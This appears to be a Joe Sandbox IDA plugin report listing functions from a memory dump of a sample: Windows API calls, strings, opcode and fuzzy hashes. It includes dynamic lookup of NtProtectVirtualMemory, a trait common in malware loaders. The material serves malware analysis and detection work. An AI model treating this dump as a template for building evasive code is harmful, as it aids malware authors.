                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                    • String ID:
                                                                                                    • API String ID: 4102113445-0
                                                                                                    • Opcode ID: 4f626de45a17940fb166dc8d7f4902faaa959b815c2a7e9f55a3834dbd6b4adc
                                                                                                    • Instruction ID: 7f2d7214b92c7b89cc2bb7f1243cc25699145942d73397cc7a66f89f5feb63bc
                                                                                                    • Opcode Fuzzy Hash: 4f626de45a17940fb166dc8d7f4902faaa959b815c2a7e9f55a3834dbd6b4adc
                                                                                                    • Instruction Fuzzy Hash: E001F270708208ABFB11BAA48DD2F5E369CDF49728F51C560F504E66D4E7F8BE10866C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 0415257F
                                                                                                    • SetEvent.KERNEL32(00000000,04154D8A), ref: 0415259A
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0415259F
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,04154D8A), ref: 041525B4
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,04154D8A), ref: 041525BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2429646606-0
                                                                                                    • Opcode ID: 39183055557482d68f94f590328f423d8b6b3942f5c94021ac7522f652833c6a
                                                                                                    • Instruction ID: 0f6d55e2636c432fcc65aec458bc777f84d038ad89be2020d51524d9fe4208f3
                                                                                                    • Opcode Fuzzy Hash: 39183055557482d68f94f590328f423d8b6b3942f5c94021ac7522f652833c6a
                                                                                                    • Instruction Fuzzy Hash: BBF0F2715002C09FD718EBAAE8CAA8633F5EB04684B049964E428C3190CBBABC98CF11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,0410BDD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0410BC2F
                                                                                                      • Part of subcall function 0410B8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0410B8E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread
                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                    • Opcode ID: 851104337b367ed8bdeeb246f8de9edcb6ffdd19f42d50b37cafafdd88011ff7
                                                                                                    • Instruction ID: f65302bfc08f1377708c5d4cdc460d0955cf2c65ed5c31793f2daeda54877f5d
                                                                                                    • Opcode Fuzzy Hash: 851104337b367ed8bdeeb246f8de9edcb6ffdd19f42d50b37cafafdd88011ff7
                                                                                                    • Instruction Fuzzy Hash: 2541313070C1058BF701EAE88AD02BEF2AADB8520CB14C065D562D73C4EBF4FD069765
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 041334E6
                                                                                                    • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 04133538
                                                                                                    • DrawMenuBar.USER32(00000000), ref: 04133545
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                    • String ID: P
                                                                                                    • API String ID: 3227129158-3110715001
                                                                                                    • Opcode ID: 720aa4310928510092f1424f500b4a4cb0198235fd618298716da295b09d7eb0
                                                                                                    • Instruction ID: 8f6cc05786251ff7d01272ba84fcc458ac2b7f839b63266c3611a6b9f3dcca91
                                                                                                    • Opcode Fuzzy Hash: 720aa4310928510092f1424f500b4a4cb0198235fd618298716da295b09d7eb0
                                                                                                    • Instruction Fuzzy Hash: 6711CE70205204AFE350DB28CCC1B5A7BD9AB84325F14C6A8F4A4DB2D4CB79E884C78A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 0411FC21
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0411FC27
                                                                                                    Strings
                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 0411FC1C
                                                                                                    • NtProtectVirtualMemory, xrefs: 0411FC17
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                    • API String ID: 1646373207-1386159242
                                                                                                    • Opcode ID: 16b6ebe1ee80a5671a49f496512f5ec6ca3e3c2896e47ca1850d4dc726e241c6
                                                                                                    • Instruction ID: 0100ad7bb3c4e22e1c6048e6a622113d25337a270d3b08af86c7ec8f240d3ec0
                                                                                                    • Opcode Fuzzy Hash: 16b6ebe1ee80a5671a49f496512f5ec6ca3e3c2896e47ca1850d4dc726e241c6
                                                                                                    • Instruction Fuzzy Hash: A8E0B6B6600288AF8B40EF99D9C5E8B3BECAB0C6607404010FA18C7210CB75F9A59B74
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0416910B,00000000,0416911E), ref: 0410D6A6
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0410D6B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                    • Opcode ID: 9ee5cb33549eea8214e9c07b18df207a1124be59dd00b989aa0bac4ed22eb2e9
                                                                                                    • Instruction ID: c467bc3841ced89dfc8ad080e4e2dad6f2193ad980e072a532be6cddce3c9586
                                                                                                    • Opcode Fuzzy Hash: 9ee5cb33549eea8214e9c07b18df207a1124be59dd00b989aa0bac4ed22eb2e9
                                                                                                    • Instruction Fuzzy Hash: 43D05EF0B903448BEB00BAE174C061132E8EB01346B008165A40C761D0C7F8E891CB14
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 0413D6AB
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 0413D6E6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0012eed08091de9c277f7deaea2b18a2b251f1d017657b1455f36c520c867250
                                                                                                    • Instruction ID: 79f05798df603c679825cbd967dbbd52d73b547468320c309f92100fea08e2f9
                                                                                                    • Opcode Fuzzy Hash: 0012eed08091de9c277f7deaea2b18a2b251f1d017657b1455f36c520c867250
                                                                                                    • Instruction Fuzzy Hash: CCD156B0A04A099FDB15CFB9D484BAABBF6FF49301F108999E46A9B354D730F941CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 04138155
                                                                                                    • GetDesktopWindow.USER32 ref: 04138285
                                                                                                    • SetCursor.USER32(00000000), ref: 041382DA
                                                                                                      • Part of subcall function 04143C30: ImageList_EndDrag.COMCTL32(?,-00000010,041382B5), ref: 04143C4C
                                                                                                    • SetCursor.USER32(00000000), ref: 041382C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CursorDesktopWindow$DragImageList_
                                                                                                    • String ID:
                                                                                                    • API String ID: 617806055-0
                                                                                                    • Opcode ID: e15433f3c7a94766953e2ebe3f900d591bfa3c28db72b0bd9f008d7dbc799dac
                                                                                                    • Instruction ID: 1733eeb5f9b09a257afbd16e470892da49db3cab19afdcff91489e3925661289
                                                                                                    • Opcode Fuzzy Hash: e15433f3c7a94766953e2ebe3f900d591bfa3c28db72b0bd9f008d7dbc799dac
                                                                                                    • Instruction Fuzzy Hash: 17914635600281CFD704EF2AE6C8A197BE1EF99385F198594E8448B365CB78FCC9DB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0410F603
                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0410F61F
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0410F696
                                                                                                    • VariantClear.OLEAUT32(?), ref: 0410F6BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 920484758-0
                                                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                    • Instruction ID: 6555b048f57d024e691f0ccf5a6430638080860cc38302a9c750aceba7426496
                                                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                    • Instruction Fuzzy Hash: 8C412875A0121D8FDB61EF58C8D1BC9B3BCAB48214F0085D5E548E7291DBB0BF818F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0410BE59
                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0410BE7D
                                                                                                    • GetModuleFileNameA.KERNEL32(04100000,?,00000105), ref: 0410BE98
                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0410BF2E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3990497365-0
                                                                                                    • Opcode ID: 438732681ef416c001306c7b6bb8e3c4f3753c534d78a1c4282c1cf3f5ce76fd
                                                                                                    • Instruction ID: db59d91fba965899371e255e89ad2312cc4eda2744020b7bdec23fe6e3a777a9
                                                                                                    • Opcode Fuzzy Hash: 438732681ef416c001306c7b6bb8e3c4f3753c534d78a1c4282c1cf3f5ce76fd
                                                                                                    • Instruction Fuzzy Hash: 09410D70A142589BEB21DBA8CDC4BDAB7F89B08304F4080E5E548E7291DBB4BF848F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0410BE59
                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0410BE7D
                                                                                                    • GetModuleFileNameA.KERNEL32(04100000,?,00000105), ref: 0410BE98
                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0410BF2E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3990497365-0
                                                                                                    • Opcode ID: fd27646b8da209db1e039acaaa56b95fe182262ca08ec8698e22544b84403591
                                                                                                    • Instruction ID: a944b5e8e41b605b38aa8b2e0c68a25e1ea82802724fcfa11a1888d113c38571
                                                                                                    • Opcode Fuzzy Hash: fd27646b8da209db1e039acaaa56b95fe182262ca08ec8698e22544b84403591
                                                                                                    • Instruction Fuzzy Hash: 8B41ED70A142589BEB21DBA8CDC4BDAB7ED9B08304F4480E5E548E7295DBB4BF848F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetKeyboardLayout.USER32(00000000), ref: 0415157D
                                                                                                    • GetDC.USER32(00000000), ref: 041515D2
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 041515DC
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 041515E7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDeviceKeyboardLayoutRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3331096196-0
                                                                                                    • Opcode ID: 37b72b6612c1d07c5484780482f38320963ab199f49aaad4b829fc826973777f
                                                                                                    • Instruction ID: ed8a95c9b67e21f88c23a7a204cf7485f223a8c2ccdb1d53f8d84f43d3960971
                                                                                                    • Opcode Fuzzy Hash: 37b72b6612c1d07c5484780482f38320963ab199f49aaad4b829fc826973777f
                                                                                                    • Instruction Fuzzy Hash: 3D311C70A00250AFE751EF6DD9C4B897BE1FB04218F0581AAEC28CF3A1D776AC44CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 04122E8C: EnterCriticalSection.KERNEL32(0419A3A0,00000000,0412183E,00000000,0412189D), ref: 04122E94
                                                                                                      • Part of subcall function 04122E8C: LeaveCriticalSection.KERNEL32(0419A3A0,0419A3A0,00000000,0412183E,00000000,0412189D), ref: 04122EA1
                                                                                                      • Part of subcall function 04122E8C: EnterCriticalSection.KERNEL32(00000038,0419A3A0,0419A3A0,00000000,0412183E,00000000,0412189D), ref: 04122EAA
                                                                                                      • Part of subcall function 0412614C: GetDC.USER32(00000000), ref: 041261A2
                                                                                                      • Part of subcall function 0412614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 041261B7
                                                                                                      • Part of subcall function 0412614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 041261C1
                                                                                                      • Part of subcall function 0412614C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,04124D0F,00000000,04124D9B), ref: 041261E5
                                                                                                      • Part of subcall function 0412614C: ReleaseDC.USER32(00000000,00000000), ref: 041261F0
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 04124D11
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 04124D2A
                                                                                                    • SelectPalette.GDI32(00000000,?,000000FF), ref: 04124D53
                                                                                                    • RealizePalette.GDI32(00000000), ref: 04124D5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 979337279-0
                                                                                                    • Opcode ID: 8f40bc717fd128c6f02dcbaa2d826009d05793c6e5ac68e34e88bf9e13efd425
                                                                                                    • Instruction ID: 84c25903d88343bbcc733549e0d79c3f7a7506c3b57be477c687d0449c159507
                                                                                                    • Opcode Fuzzy Hash: 8f40bc717fd128c6f02dcbaa2d826009d05793c6e5ac68e34e88bf9e13efd425
                                                                                                    • Instruction Fuzzy Hash: CC31E234A00628EFE714EB69CAC0E5DB7F5EF48624B2241A1A804EB361D730FE50EB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetMenuState.USER32(?,?,?), ref: 04133B7F
                                                                                                    • GetSubMenu.USER32(?,?), ref: 04133B8A
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 04133BA3
                                                                                                    • GetMenuStringA.USER32(?,?,?,?,?), ref: 04133BF6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$ItemStateString
                                                                                                    • String ID:
                                                                                                    • API String ID: 306270399-0
                                                                                                    • Opcode ID: fb3a58c3da9fc6d7ae6682bba016efb31c07ea6290ae3b7c05858ba206872267
                                                                                                    • Instruction ID: b73c23a5237ebab1524608893eb4299231fb9ac52f5368120eba49cad0f61735
                                                                                                    • Opcode Fuzzy Hash: fb3a58c3da9fc6d7ae6682bba016efb31c07ea6290ae3b7c05858ba206872267
                                                                                                    • Instruction Fuzzy Hash: E611AF31200208AFEB04EE6CCCC0DAF77E89F49255B1081A9FC28C7294D770FD0193A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0411D6EF
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0411D6FE
                                                                                                    • EnterCriticalSection.KERNEL32(0419A2EC), ref: 0411D743
                                                                                                    • InterlockedExchange.KERNEL32(0416AAF0,?), ref: 0411D75F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 2380408948-0
                                                                                                    • Opcode ID: 4a61ad2deda2213b2c2a496798471d81e496fc6ebd0a01edd18a742f8bab4464
                                                                                                    • Instruction ID: 33c7c3fa9d09591039f4e4a50ebdd92fa7e7ff9aff2d038eb57a391b6d0c3b3c
                                                                                                    • Opcode Fuzzy Hash: 4a61ad2deda2213b2c2a496798471d81e496fc6ebd0a01edd18a742f8bab4464
                                                                                                    • Instruction Fuzzy Hash: 8F21A430B04244EFE714EBA8E8C1B6AB7F8EB05318F51C4B4E405D22A0E7B5BD54CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • EnumWindows.USER32(Function_00052CA4), ref: 04152D49
                                                                                                    • GetWindow.USER32(00000003,00000003), ref: 04152D61
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 04152D6E
                                                                                                    • SetWindowPos.USER32(00000000,00000213,00000000,00000000,00000000,00000000,00000213,00000000,000000EC,00000003,00000003), ref: 04152DAD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnumLongWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 4191631535-0
                                                                                                    • Opcode ID: 3d5efa744b10f355a672a6ac320ff96b8dc6002b9249a4e08afcdfeca9db9dbd
                                                                                                    • Instruction ID: 4329039c98bbf2ca83eb234273f71110ef76ed3d6868ad9b25b99b4c0355aac1
                                                                                                    • Opcode Fuzzy Hash: 3d5efa744b10f355a672a6ac320ff96b8dc6002b9249a4e08afcdfeca9db9dbd
                                                                                                    • Instruction Fuzzy Hash: 2E112E316046109FEB10AA68CCC5FD57794EF05724F1542A4FDA8AB2E6C3B0AC40CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
                                                                                                    • Instruction ID: a202c795c5741c9538a0e0c482dda0bc96df2b35efb2d1378c432e1a3afc65c2
                                                                                                    • Opcode Fuzzy Hash: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
                                                                                                    • Instruction Fuzzy Hash: 3101FB2070425C6FA774BE2A5CC4F5B7E9DDFC5795B008078782D8B346EBA5FC1582A8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 04137F35
